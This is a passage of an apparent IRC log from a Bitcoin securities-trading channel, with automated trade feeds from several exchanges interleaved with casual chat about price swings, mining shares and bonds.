16:30:34 [HAVELOCK] [SMG] 8000 @ 0.000302 = 2.416 BTC [+] Jul 19 16:30:36 [HAVELOCK] [SMG] 2000 @ 0.0003 = 0.6 BTC [-] Jul 19 16:31:46 [BTCTC] [TAT.ASICMINER] 11 @ 0.043419 = 0.4776 BTC [+] Jul 19 16:31:48 [BTCTC] [AMC-PT] 15 @ 0.00295 = 0.0443 BTC [+] Jul 19 16:32:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.043418 = 0.2605 BTC [-] Jul 19 16:32:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.043415 = 0.4342 BTC [-] Jul 19 16:32:33 [BTCTC] [TAT.ASICMINER] 19 @ 0.0434 = 0.8246 BTC [-] Jul 19 16:32:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.043001 = 0.645 BTC [-] Jul 19 16:33:40 [BTCTC] [TAT.ASICMINER] 8 @ 0.043002 = 0.344 BTC [+] Jul 19 16:33:44 [HAVELOCK] [AM100] 3 @ 0.0438 = 0.1314 BTC [-] Jul 19 16:33:46 [HAVELOCK] [AM100] 53 @ 0.0436 = 2.3108 BTC [-] Jul 19 16:33:48 [HAVELOCK] [AM100] 84 @ 0.0436 = 3.6624 BTC [-] Jul 19 16:34:31 [BTCTC] [TAT.ASICMINER] 9 @ 0.043002 = 0.387 BTC [+] Jul 19 16:34:33 [BTCTC] [TAT.ASICMINER] 11 @ 0.043001 = 0.473 BTC [-] Jul 19 16:34:35 [BTCTC] [TAT.ASICMINER] 15 @ 0.043 = 0.645 BTC [-] Jul 19 16:34:43 [BTCTC] [AMC-PT] 1000 @ 0.00291 = 2.91 BTC [-] Jul 19 16:34:53 aaaaaand it's gooooone!!!! xD Jul 19 16:35:31 [BTCTC] [ASICMINER-PT] 1 @ 4.799 BTC [+] Jul 19 16:35:34 [BTCTC] [AMC-PT] 95 @ 0.00295 = 0.2803 BTC [+] Jul 19 16:35:48 [BTCTC] [BFMINES] 10 @ 0.0038 = 0.038 BTC [-] Jul 19 16:36:26 Vbs: what's gone? Jul 19 16:36:35 ActM's wall Jul 19 16:36:51 I can't believe how much bitcoin is crashing. I mean we're seeing $77 mid-afternoon, down to $61 by Sunday. $55 by midweek next week, possibly a bit of a bounceback and then a gradual fall, and we'll be stabilizing around $49. Jul 19 16:37:17 are you on drugs? Jul 19 16:37:25 None of those things are true :( Jul 19 16:37:54 ;;baratio Jul 19 16:37:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.004099 = 0.041 BTC [+] Jul 19 16:37:55 Total bids: 11715944 USD. Total asks: 120415 BTC. Ratio: 97.29584 USD/BTC. | Data vintage: 0.0070 seconds Jul 19 16:38:05 tanking? naaahhhh Jul 19 16:38:11 I can't believe how much bitcoin is crashing. I mean we're seeing $77 mid-afternoon, down to $61 by Sunday. $55 by midweek next week, possibly a bit of a bounceback and then a gradual fall, and we'll be stabilizing around $49. Jul 19 16:38:18 oic Jul 19 16:38:30 It's barely moved at all in the past 12hrs Jul 19 16:38:40 It has* Jul 19 16:38:55 on an unrelated topic, does anyone else just pretend bitcoin is worth exactly $100 when dealing with day-to-day business? Jul 19 16:39:13 yes, I think of it as 100 when estimating what things should cost Jul 19 16:39:23 Same Jul 19 16:39:45 I see there was a drop a few hours ago, but it has staqbilized since then? Jul 19 16:39:58 stabilized* Jul 19 16:40:17 havelock's spot price hasn't moved much Jul 19 16:40:20 check the disparity Jul 19 16:40:23 ;;ticker Jul 19 16:40:24 MtGox BTCUSD ticker | Best bid: 90.57138, Best ask: 90.57140, Bid-ask spread: 0.00002, Last trade: 90.57138, 24 hour volume: 18083.80709042, 24 hour low: 87.50000, 24 hour high: 92.79990, 24 hour vwap: 89.82796 Jul 19 16:40:28 ;;baratio Jul 19 16:40:29 Total bids: 11715192 USD. Total asks: 120412 BTC. Ratio: 97.29214 USD/BTC. | Data vintage: 17.3632 seconds Jul 19 16:40:36 going up! :) Jul 19 16:41:21 I think there was a big downward movement yesterday because people were afraid all the S.Dice investors would cash out and crash the market, but it looks like it never happened Jul 19 16:41:40 [BTCTC] [BASIC-MINING] 1 @ 0.74 BTC [+] Jul 19 16:43:02 I'm having a hard time seeing AMC's value truly sky rocket Jul 19 16:43:21 people still cash out? ;) Jul 19 16:44:04 is this the litecoin asset channel too? Jul 19 16:48:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.043 = 0.86 BTC [-] Jul 19 16:48:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.043 = 0.172 BTC [-] Jul 19 16:48:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.043 = 0.43 BTC [-] Jul 19 16:48:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.043 = 0.129 BTC [-] Jul 19 16:48:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.04265 = 0.2133 BTC [-] Jul 19 16:48:28 [BTCTC] [TAT.ASICMINER] 23 @ 0.042622 = 0.9803 BTC [-] Jul 19 16:48:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.042616 = 0.4262 BTC [-] Jul 19 16:48:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.0426 = 0.0852 BTC [-] Jul 19 16:48:36 [BTCTC] [TAT.ASICMINER] 11 @ 0.0426 = 0.4686 BTC [-] Jul 19 16:48:44 [BTCTC] [AMC-PT] 30 @ 0.00255 = 0.0765 BTC [-] Jul 19 16:48:46 [BTCTC] [AMC-PT] 5 @ 0.00252 = 0.0126 BTC [-] Jul 19 16:48:48 [BTCTC] [AMC-PT] 1 @ 0.002512 BTC [-] Jul 19 16:48:49 [BTCTC] [AMC-PT] 1 @ 0.002511 BTC [-] Jul 19 16:48:50 [BTCTC] [AMC-PT] 7 @ 0.00251 = 0.0176 BTC [-] Jul 19 16:48:52 [BTCTC] [AMC-PT] 200 @ 0.002505 = 0.501 BTC [-] Jul 19 16:48:53 [BTCTC] [AMC-PT] 130 @ 0.002501 = 0.3251 BTC [-] Jul 19 16:48:55 [BTCTC] [AMC-PT] 24 @ 0.0025 = 0.06 BTC [-] Jul 19 16:49:01 [BTCTC] [AMC-PT] 3499 @ 0.0025 = 8.7475 BTC [-] Jul 19 16:49:17 Ah yeah see there Jul 19 16:49:30 Hmmmm I'll still pour some cash in there Jul 19 16:51:52 Rulother__: the value will rise quite a bit once eAsic releases a press statement on their website Jul 19 16:52:16 that will have good visibility to... whales! xD Jul 19 16:52:32 talk about speculation Jul 19 16:53:20 Maybe Jul 19 16:55:00 [HAVELOCK] [AM1] 1 @ 4.7499 BTC [+] Jul 19 16:55:31 [BTCTC] [ASICMINER-PT] 2 @ 4.745 = 9.49 BTC [-] Jul 19 16:55:32 [BTCTC] [ASICMINER-PT] 1 @ 4.74 BTC [-] Jul 19 16:57:35 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.004099 = 0.164 BTC [+] Jul 19 16:57:37 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004007 = 0.024 BTC [-] Jul 19 16:59:46 BUY BUY BUY Jul 19 16:59:56 SELL SELL SELL Jul 19 17:00:10 [HAVELOCK] [SDSTM] [PAID] 2.00000000 BTC to 100`000 shares, 2000 satoshi per share Jul 19 17:00:31 HOLD HOLD HOLD Jul 19 17:00:56 [BTCTC] [AMC-PT] 100 @ 0.00286 = 0.286 BTC [+] Jul 19 17:01:31 [BTCTC] [AMC-PT] 1394 @ 0.00286 = 3.9868 BTC [+] Jul 19 17:02:35 [HAVELOCK] [SDSTM] 15 @ 0.0107 = 0.1605 BTC [-] Jul 19 17:05:50 [HAVELOCK] [AM1] 2 @ 4.75 = 9.5 BTC [+] Jul 19 17:05:59 [BTCTC] [AMC-PT] 2000 @ 0.00285 = 5.7 BTC [-] Jul 19 17:06:41 so Sandstorm is giving 2% from IPO price, but people have bid it up so now it is just 0.2% for this week, roughly equivalent to holding btc-bond Jul 19 17:07:01 [HAVELOCK] [AM1] 1 @ 4.75 BTC [+] Jul 19 17:07:10 [HAVELOCK] [AM100] 3 @ 0.0448999 = 0.1347 BTC [+] Jul 19 17:07:12 [HAVELOCK] [AM100] 10 @ 0.0449 = 0.449 BTC [+] Jul 19 17:07:15 [HAVELOCK] [AM100] 3 @ 0.0449 = 0.1347 BTC [+] Jul 19 17:07:16 [HAVELOCK] [AM100] 5 @ 0.045 = 0.225 BTC [+] Jul 19 17:07:18 [HAVELOCK] [AM100] 8 @ 0.0454998 = 0.364 BTC [+] Jul 19 17:07:20 [BTCTC] [AMC-PT] 980 @ 0.00285 = 2.793 BTC [-] Jul 19 17:07:21 [HAVELOCK] [AM100] 40 @ 0.0455 = 1.82 BTC [+] Jul 19 17:07:23 [HAVELOCK] [AM100] 31 @ 0.0458 = 1.4198 BTC [+] Jul 19 17:07:25 [BTCTC] [AMC-PT] 2 @ 0.002849 = 0.0057 BTC [-] Jul 19 17:07:26 [BTCTC] [AMC-PT] 7000 @ 0.0027 = 18.9 BTC [-] Jul 19 17:07:28 [BTCTC] [AMC-PT] 2220 @ 0.002691 = 5.974 BTC [-] Jul 19 17:07:29 [HAVELOCK] [AM1] 1 @ 4.75 BTC [+] Jul 19 17:07:39 [BTCTC] [DMS.MINING] 3 @ 0.016249 = 0.0487 BTC [+] Jul 19 17:07:41 [BTCTC] [DMS.MINING] 1 @ 0.016249 BTC [+] Jul 19 17:07:41 [BTCTC] [DMS.MINING] 38 @ 0.016249 = 0.6175 BTC [+] Jul 19 17:08:39 [BTCTC] [AMC-PT] 2 @ 0.002854 = 0.0057 BTC [+] Jul 19 17:08:51 [BTCTC] [AMC-PT] 980 @ 0.002691 = 2.6372 BTC [-] Jul 19 17:11:36 [BTCTC] [COGNITIVE] 1 @ 0.700001 BTC [+] Jul 19 17:11:38 [BTCTC] [COGNITIVE] 1 @ 0.7 BTC [-] Jul 19 17:12:32 hi all Jul 19 17:13:22 [BTCTC] [AMC-PT] 490 @ 0.002839 = 1.3911 BTC [+] Jul 19 17:13:49 mornin Jul 19 17:14:01 morning Jul 19 17:16:16 [BTCTC] [AMC-PT] 12000 @ 0.0026 = 31.2 BTC [-] Jul 19 17:18:58 [BTCTC] [AMC-PT] 530 @ 0.00258 = 1.3674 BTC [-] Jul 19 17:20:32 [HAVELOCK] [AM100] 2 @ 0.045799 = 0.0916 BTC [-] Jul 19 17:21:37 [BTCTC] [AMC-PT] 380 @ 0.0026 = 0.988 BTC [+] Jul 19 17:21:39 [BTCTC] [AMC-PT] 50 @ 0.002585 = 0.1293 BTC [-] Jul 19 17:21:40 [BTCTC] [AMC-PT] 3023 @ 0.00253 = 7.6482 BTC [-] Jul 19 17:25:44 oh fuck. left s.dice open, of course users insisted on trying to open orders Jul 19 17:26:57 no, it's just annoying, they write emails "i have got stuck order" Jul 19 17:27:09 and i have to be completely elsewhere Jul 19 17:27:39 [HAVELOCK] [SMG] 10 @ 0.0004495 = 0.0045 BTC [+] Jul 19 17:28:47 btc is the real life? hahaha. cu later. and mircea_popescu, please do withdrawals Jul 19 17:29:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.045997 = 0.138 BTC [+] Jul 19 17:33:44 [HAVELOCK] [SDSTM] 10 @ 0.0107 = 0.107 BTC [-] Jul 19 17:34:02 [HAVELOCK] [VTX] 1 @ 0.65999999 BTC [+] Jul 19 17:34:06 [BTCTC] [AMC-PT] 380 @ 0.00253 = 0.9614 BTC [-] Jul 19 17:34:08 [BTCTC] [AMC-PT] 190 @ 0.00252 = 0.4788 BTC [-] Jul 19 17:34:10 [BTCTC] [AMC-PT] 8361 @ 0.00251 = 20.9861 BTC [-] Jul 19 17:34:19 [HAVELOCK] [SDSTM] 1 @ 0.0118 BTC [+] Jul 19 17:34:43 [HAVELOCK] [SMG] 250 @ 0.000375 = 0.0938 BTC [-] Jul 19 17:36:14 [BTCTC] [AMC-PT] 2321 @ 0.00251 = 5.8257 BTC [-] Jul 19 17:37:47 [BTCTC] [ASICMINER-PT] 1 @ 4.7025 BTC [-] Jul 19 17:37:49 [BTCTC] [ASICMINER-PT] 3 @ 4.7 = 14.1 BTC [-] Jul 19 17:37:52 [BTCTC] [ASICMINER-PT] 10 @ 4.7 = 47 BTC [-] Jul 19 17:39:05 [BTCTC] [ASICMINER-PT] 10 @ 4.15 = 41.5 BTC [-] Jul 19 17:39:23 [BTCTC] [ASICMINER-PT] 4 @ 4.21 = 16.84 BTC [+] Jul 19 17:40:47 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199998 = 1 BTC [+] Jul 19 17:45:31 [HAVELOCK] [AM100] 1 @ 0.0451 BTC [-] Jul 19 17:47:23 That's quite a dip Jul 19 17:47:39 [HAVELOCK] [AM100] 1 @ 0.0451 BTC [-] Jul 19 17:48:45 options excercise Jul 19 17:48:46 that was a option Jul 19 17:48:58 [BTCTC] [AMC-PT] 100 @ 0.00262 = 0.262 BTC [+] Jul 19 17:49:21 Time to off my cog at a loss for basic I suppose Jul 19 17:49:37 [BTCTC] [AMC-PT] 7160 @ 0.00263 = 18.8308 BTC [+] Jul 19 17:49:41 [HAVELOCK] [AM100] 3 @ 0.045799 = 0.1374 BTC [+] Jul 19 17:49:58 [BTCTC] [DMS.PURCHASE] 10 @ 0.039505 = 0.3951 BTC [-] Jul 19 17:50:12 That ask wall though Jul 19 17:50:26 [BTCTC] [AMC-PT] 100 @ 0.00264 = 0.264 BTC [+] Jul 19 17:51:37 yes this is true Jul 19 17:51:46 I know Jul 19 17:52:13 [BTCTC] [AMC-PT] 50 @ 0.00265 = 0.1325 BTC [+] Jul 19 17:52:33 Didn't Basic just double theirs? Jul 19 17:52:54 [BTCTC] [AMC-PT] 71 @ 0.00265 = 0.1882 BTC [+] Jul 19 17:53:04 I bought low before the big surge and sold and bought back in Jul 19 17:53:11 [BTCTC] [AMC-PT] 1000 @ 0.00265 = 2.65 BTC [+] Jul 19 17:53:31 [HAVELOCK] [SMG] 8 @ 0.000304 = 0.0024 BTC [-] Jul 19 17:53:33 [HAVELOCK] [SMG] 10000 @ 0.000303 = 3.03 BTC [-] Jul 19 17:53:35 [HAVELOCK] [SMG] 10 @ 0.000301 = 0.003 BTC [-] Jul 19 17:53:37 [HAVELOCK] [SMG] 120 @ 0.0003002 = 0.036 BTC [-] Jul 19 17:53:39 [HAVELOCK] [SMG] 5000 @ 0.00030011 = 1.5006 BTC [-] Jul 19 17:53:41 [HAVELOCK] [SMG] 4862 @ 0.0003 = 1.4586 BTC [-] Jul 19 17:53:47 [BTCTC] [TAT.ASICMINER] 45 @ 0.045997 = 2.0699 BTC [+] Jul 19 17:55:53 [BTCTC] [AMC-PT] 500 @ 0.00265 = 1.325 BTC [+] Jul 19 17:58:44 Either way I need to get rid of my cog shares so I can get to buying/selling again. Jul 19 17:59:05 [HAVELOCK] [HIM] 1 @ 0.268 BTC [+] Jul 19 17:59:06 Unless for whatever reason it might hit .95 today, which I doubt Jul 19 17:59:37 If I see movement at all, I'll buy back in. Jul 19 17:59:47 [HAVELOCK] [SMG] 8 @ 0.000332 = 0.0027 BTC [+] Jul 19 18:00:03 sounds like you are looking for excuses to lose money, Jul 19 18:00:08 But them just sitting there not gaining any value and a couple of days before the next div, no point of doing such Jul 19 18:00:15 my advice is sell the COG and sit on the coin Jul 19 18:00:18 or buy bonds Jul 19 18:00:20 and relax Jul 19 18:00:28 [BTCTC] [AMC-PT] 3 @ 0.00265 = 0.008 BTC [+] Jul 19 18:00:57 ... ? Jul 19 18:01:01 ? Jul 19 18:01:09 [HAVELOCK] [AM100] 1 @ 0.045799 BTC [+] Jul 19 18:01:14 you can buy Deprived's bond or Nam's bond Jul 19 18:01:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0459 BTC [-] Jul 19 18:01:33 [BTCTC] [BFMINES] 1 @ 0.003551 BTC [-] Jul 19 18:01:41 they pay okay and dont open you up to the massive risk of being bad at trading Jul 19 18:01:53 [BTCTC] [BFMINES] 8 @ 0.00355 = 0.0284 BTC [-] Jul 19 18:02:05 just dont overpay for the bonds Jul 19 18:02:13 yeah, you just expose yourself to the risk they will default Jul 19 18:02:25 [BTCTC] [AMC-PT] 750 @ 0.00265 = 1.9875 BTC [+] Jul 19 18:02:38 you think Deprived or Nam will fuck up befor COG or BASIC? Jul 19 18:02:41 [BTCTC] [AMC-PT] 12 @ 0.00265 = 0.0318 BTC [+] Jul 19 18:02:56 TaT, i don't imply that Jul 19 18:03:06 then why sat it Jul 19 18:03:08 say Jul 19 18:03:23 i didnt suggest he buy FIMB or anything Jul 19 18:03:25 just to remind them there is still a risk Jul 19 18:03:27 [BTCTC] [BITVPS] 2 @ 0.001805 = 0.0036 BTC [-] Jul 19 18:03:29 [BTCTC] [BITVPS] 133 @ 0.001801 = 0.2395 BTC [-] Jul 19 18:03:40 yes, every single asset has that same risk though Jul 19 18:04:05 only way to factor it is comparitively Jul 19 18:04:09 [HAVELOCK] [SMG] 3 @ 0.000333 = 0.001 BTC [+] Jul 19 18:04:41 I held a good bit of VM at one point Jul 19 18:04:44 [HAVELOCK] [SMG] 26 @ 0.000333 = 0.0087 BTC [+] Jul 19 18:04:51 [BTCTC] [AMC-PT] 91 @ 0.00265 = 0.2412 BTC [+] Jul 19 18:04:54 like i said, only way to factor it is comparitively Jul 19 18:05:00 But like I said I don't really do long term investments. Jul 19 18:05:24 buying a PMB is worse for you than COG or BASIC Jul 19 18:05:36 you can speculate and make money if you are luck and have good timing Jul 19 18:05:39 but really Jul 19 18:05:44 the diff is going up so much Jul 19 18:05:49 its too risky Jul 19 18:05:56 yeah, i wouldn't go into any mining investement atm Jul 19 18:06:33 well we have all seen that no one ever ships when they say they will Jul 19 18:06:33 they're bound to fail Jul 19 18:06:42 yeah diff is gonna keep going up Jul 19 18:06:48 and the KNC annoucement, oh my... Jul 19 18:06:53 but the death of mining may be greatly exaggerated too Jul 19 18:07:05 it's not the death TaT Jul 19 18:07:13 i'm exaggerating ;) Jul 19 18:07:20 it's just the ROI will be 100 times smaller than was it forecast Jul 19 18:07:27 Yeah I put in my request to cancel my singles last night Jul 19 18:07:28 *what is Jul 19 18:08:25 [HAVELOCK] [SDSTM] 1 @ 0.0118 BTC [+] Jul 19 18:08:39 [BTCTC] [AMC-PT] 100 @ 0.00273 = 0.273 BTC [+] Jul 19 18:09:56 [HAVELOCK] [SMG] 24 @ 0.000333 = 0.008 BTC [+] Jul 19 18:10:05 [BTCTC] [AMC-PT] 1 @ 0.002719 BTC [-] Jul 19 18:11:32 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 19 18:12:27 [BTCTC] [AMC-PT] 1 @ 0.002715 BTC [-] Jul 19 18:12:29 [BTCTC] [AMC-PT] 4999 @ 0.00265 = 13.2474 BTC [-] Jul 19 18:13:50 [HAVELOCK] [SMG] 492 @ 0.000332 = 0.1633 BTC [-] Jul 19 18:13:53 [HAVELOCK] [SMG] 9 @ 0.0003001 = 0.0027 BTC [-] Jul 19 18:13:55 [HAVELOCK] [SMG] 638 @ 0.0003 = 0.1914 BTC [-] Jul 19 18:14:26 [BTCTC] [AMC-PT] 299 @ 0.00265 = 0.7924 BTC [-] Jul 19 18:16:42 [BTCTC] [ASICMINER-PT] 10 @ 4.2 = 42 BTC [-] Jul 19 18:16:57 [BTCTC] [BASIC-MINING] 3 @ 0.734 = 2.202 BTC [-] Jul 19 18:17:11 [BTCTC] [BTC-BOND] 2 @ 0.00995 = 0.0199 BTC [-] Jul 19 18:17:12 [BTCTC] [AMC-PT] 100 @ 0.00273 = 0.273 BTC [+] Jul 19 18:17:13 [BTCTC] [AMC-PT] 1 @ 0.00274 BTC [+] Jul 19 18:20:13 [HAVELOCK] [AM100] 3 @ 0.04575 = 0.1373 BTC [-] Jul 19 18:21:15 [BTCTC] [AMC-PT] 2 @ 0.00274 = 0.0055 BTC [+] Jul 19 18:23:01 [BTCTC] [ASICMINER-PT] 10 @ 4.25 = 42.5 BTC [+] Jul 19 18:23:23 [HAVELOCK] [SMG] 8 @ 0.00033 = 0.0026 BTC [+] Jul 19 18:23:32 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003801 = 0.038 BTC [-] Jul 19 18:23:51 [BTCTC] [ASICMINER-PT] 5 @ 4.671005 = 23.355 BTC [+] Jul 19 18:23:53 [BTCTC] [ASICMINER-PT] 20 @ 4.671 = 93.42 BTC [-] Jul 19 18:23:56 [BTCTC] [ASICMINER-PT] 3 @ 4.670026 = 14.0101 BTC [-] Jul 19 18:23:58 [BTCTC] [ASICMINER-PT] 5 @ 4.670016 = 23.3501 BTC [-] Jul 19 18:24:00 [BTCTC] [ASICMINER-PT] 3 @ 4.67 = 14.01 BTC [-] Jul 19 18:25:06 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Jul 19 18:25:32 [BTCTC] [ASICMINER-PT] 1 @ 4.67 BTC [+] Jul 19 18:25:54 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 19 18:26:10 [BTCTC] [ASICMINER-PT] 1 @ 4.67 BTC [+] Jul 19 18:26:35 [BTCTC] [ASICMINER-PT] 5 @ 4.699999 = 23.5 BTC [+] Jul 19 18:30:34 [BTCTC] [ASICMINER-PT] 10 @ 4.3 = 43 BTC [-] Jul 19 18:30:48 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 19 18:33:09 [BTCTC] [ASICMINER-PT] 2 @ 4.670001 = 9.34 BTC [+] Jul 19 18:33:12 [BTCTC] [ASICMINER-PT] 3 @ 4.67 = 14.01 BTC [-] Jul 19 18:33:14 [BTCTC] [ASICMINER-PT] 1 @ 4.67 BTC [-] Jul 19 18:34:22 [BTCTC] [DMS.SELLING] 20 @ 0.023999 = 0.48 BTC [+] Jul 19 18:34:24 [BTCTC] [DMS.SELLING] 35 @ 0.024 = 0.84 BTC [+] Jul 19 18:34:27 [BTCTC] [AMC-PT] 499 @ 0.0027 = 1.3473 BTC [-] Jul 19 18:36:37 [BTCTC] [AMC-PT] 1 @ 0.00285 BTC [+] Jul 19 18:36:44 [BTCTC] [AMC-PT] 5 @ 0.00285 = 0.0143 BTC [+] Jul 19 18:36:55 [BTCTC] [AMC-PT] 1 @ 0.00285 BTC [+] Jul 19 18:37:11 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9408 BTC [-] Jul 19 18:38:43 [BTCTC] [AMC-PT] 295 @ 0.00285 = 0.8408 BTC [+] Jul 19 18:38:45 [BTCTC] [AMC-PT] 355 @ 0.0029 = 1.0295 BTC [+] Jul 19 18:39:42 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.003975 = 0.0159 BTC [+] Jul 19 18:40:40 [BTCTC] [BASIC-MINING] 1 @ 0.74 BTC [+] Jul 19 18:40:40 [BTCTC] [BASIC-MINING] 1 @ 0.744 BTC [+] Jul 19 18:41:44 [BTCTC] [ASICMINER-PT] 1 @ 4.699 BTC [+] Jul 19 18:41:46 [BTCTC] [ASICMINER-PT] 7 @ 4.7 = 32.9 BTC [+] Jul 19 18:42:54 [BTCTC] [ASICMINER-PT] 8 @ 4.7 = 37.6 BTC [+] Jul 19 18:47:54 [BTCTC] [AMC-PT] 645 @ 0.0029 = 1.8705 BTC [+] Jul 19 18:48:40 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003971 = 0.0199 BTC [-] Jul 19 18:52:05 [BTCTC] [S.MPOE-PT] 2 @ 0.000882 = 0.0018 BTC [+] Jul 19 18:53:40 [BTCTC] [CRYPTO-TRADE] 3 @ 0.195001 = 0.585 BTC [-] Jul 19 18:54:35 [BTCTC] [AMC-PT] 300 @ 0.002949 = 0.8847 BTC [+] Jul 19 18:54:43 [BTCTC] [AMC-PT] 1000 @ 0.0029 = 2.9 BTC [-] Jul 19 18:55:13 [HAVELOCK] [SMG] 1 @ 0.000329 BTC [-] Jul 19 18:55:23 [BTCTC] [AMC-PT] 1875 @ 0.002949 = 5.5294 BTC [+] Jul 19 18:55:25 [HAVELOCK] [SDSTM] 8 @ 0.01175 = 0.094 BTC [-] Jul 19 18:55:37 [BTCTC] [AMC-PT] 1458 @ 0.002949 = 4.2996 BTC [+] Jul 19 18:55:38 [BTCTC] [AMC-PT] 2000 @ 0.002949 = 5.898 BTC [+] Jul 19 18:57:18 [BTCTC] [AMC-PT] 1420 @ 0.0029 = 4.118 BTC [-] Jul 19 18:58:07 [BTCTC] [AMC-PT] 229 @ 0.00295 = 0.6756 BTC [+] Jul 19 18:59:53 [BTCTC] [AMC-PT] 271 @ 0.00295 = 0.7995 BTC [+] Jul 19 18:59:54 [BTCTC] [COGNITIVE] 3 @ 0.73 = 2.19 BTC [+] Jul 19 19:00:45 [BTCTC] [AMC-PT] 500 @ 0.00298 = 1.49 BTC [+] Jul 19 19:00:47 [BTCTC] [AMC-PT] 500 @ 0.00298 = 1.49 BTC [+] Jul 19 19:00:50 [HAVELOCK] [AM100] 1 @ 0.04450001 BTC [-] Jul 19 19:00:51 [HAVELOCK] [AM100] 1 @ 0.04450001 BTC [-] Jul 19 19:01:26 [BTCTC] [AMC-PT] 100 @ 0.003 = 0.3 BTC [+] Jul 19 19:02:21 [BTCTC] [AMC-PT] 675 @ 0.0032 = 2.16 BTC [+] Jul 19 19:02:36 [BTCTC] [AMC-PT] 200 @ 0.0032 = 0.64 BTC [+] Jul 19 19:03:21 [BTCTC] [AMC-PT] 1 @ 0.003199 BTC [-] Jul 19 19:03:34 [BTCTC] [DMS.MINING] 8 @ 0.016246 = 0.13 BTC [-] Jul 19 19:07:07 [BTCTC] [BITVPS] 1 @ 0.0019 BTC [+] Jul 19 19:07:51 [BTCTC] [AMC-PT] 1 @ 0.003185 BTC [-] Jul 19 19:08:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.043904 = 0.0878 BTC [-] Jul 19 19:09:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.043903 BTC [-] Jul 19 19:09:32 [MPEX] [S.MPOE] 14400 @ 0.00088421 = 12.7326 BTC [+] Jul 19 19:09:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.043901 = 0.439 BTC [-] Jul 19 19:10:22 [BTCTC] [AMC-PT] 199 @ 0.003185 = 0.6338 BTC [-] Jul 19 19:10:43 [HAVELOCK] [SMG] 8 @ 0.000329 = 0.0026 BTC [-] Jul 19 19:10:45 [BTCTC] [AMC-PT] 125 @ 0.0032 = 0.4 BTC [+] Jul 19 19:11:18 [BTCTC] [AMC-PT] 500 @ 0.00325 = 1.625 BTC [+] Jul 19 19:11:37 [BTCTC] [ASICMINER-PT] 1 @ 4.713 BTC [+] Jul 19 19:12:04 whats the printrate on Jul 19 19:12:06 ltc Jul 19 19:12:10 [BTCTC] [AMC-PT] 54 @ 0.00325 = 0.1755 BTC [+] Jul 19 19:12:21 [BTCTC] [AMC-PT] 150 @ 0.0034 = 0.51 BTC [+] Jul 19 19:12:43 [BTCTC] [AMC-PT] 50 @ 0.0034 = 0.17 BTC [+] Jul 19 19:13:03 [BTCTC] [AMC-PT] 800 @ 0.0034 = 2.72 BTC [+] Jul 19 19:13:38 what's the average turnaround point after an ipo?# Jul 19 19:15:55 [BTCTC] [AMC-PT] 60 @ 0.00345 = 0.207 BTC [+] Jul 19 19:16:13 [BTCTC] [AMC-PT] 125 @ 0.00345 = 0.4313 BTC [+] Jul 19 19:16:17 [BTCTC] [BASIC-MINING] 1 @ 0.720001 BTC [-] Jul 19 19:17:43 [BTCTC] [BASIC-MINING] 2 @ 0.720001 = 1.44 BTC [-] Jul 19 19:17:54 [BTCTC] [AMC-PT] 206 @ 0.00344 = 0.7086 BTC [-] Jul 19 19:18:10 [BTCTC] [AMC-PT] 400 @ 0.00344 = 1.376 BTC [-] Jul 19 19:18:38 turnaround point? Jul 19 19:18:52 you mean when they decide to close shop? Jul 19 19:18:56 [BTCTC] [B.YABMC] 1 @ 0.002504 BTC [-] Jul 19 19:19:29 [HAVELOCK] [SMG] 300 @ 0.00033 = 0.099 BTC [+] Jul 19 19:20:19 AMC is blowin up! Jul 19 19:20:39 [HAVELOCK] [SMG] 60 @ 0.00033 = 0.0198 BTC [+] Jul 19 19:20:42 no sorry.. :) i think many got prior wall takedown in to make a quick buck after Jul 19 19:20:58 so i guess there will be a point at which those start "panic selling" Jul 19 19:22:15 [BTCTC] [AMC-PT] 88 @ 0.003399 = 0.2991 BTC [-] Jul 19 19:23:28 [BTCTC] [AMC-PT] 10 @ 0.003399 = 0.034 BTC [-] Jul 19 19:24:37 [BTCTC] [AMC-PT] 10 @ 0.003399 = 0.034 BTC [-] Jul 19 19:25:05 [BTCTC] [AMC-PT] 4 @ 0.003398 = 0.0136 BTC [-] Jul 19 19:25:13 [HAVELOCK] [SMG] 10 @ 0.00033 = 0.0033 BTC [+] Jul 19 19:25:37 [BTCTC] [ASICMINER-PT] 1 @ 4.651008 BTC [-] Jul 19 19:25:40 [HAVELOCK] [SMG] 1 @ 0.00033 BTC [+] Jul 19 19:26:56 [BTCTC] [AMC-PT] 315 @ 0.0033 = 1.0395 BTC [-] Jul 19 19:29:11 [BTCTC] [AMC-PT] 685 @ 0.0033 = 2.2605 BTC [-] Jul 19 19:29:12 [BTCTC] [COGNITIVE] 1 @ 0.769999 BTC [+] Jul 19 19:29:28 [BTCTC] [TAT.ASICMINER] 25 @ 0.045996 = 1.1499 BTC [+] Jul 19 19:30:46 [BTCTC] [AMC-PT] 189 @ 0.003399 = 0.6424 BTC [+] Jul 19 19:30:49 [BTCTC] [AMC-PT] 346 @ 0.0033 = 1.1418 BTC [-] Jul 19 19:30:59 [BTCTC] [BASIC-MINING] 3 @ 0.720001 = 2.16 BTC [-] Jul 19 19:31:13 [BTCTC] [BASIC-MINING] 1 @ 0.72 BTC [-] Jul 19 19:31:39 [BTCTC] [AMC-PT] 427 @ 0.0033 = 1.4091 BTC [-] Jul 19 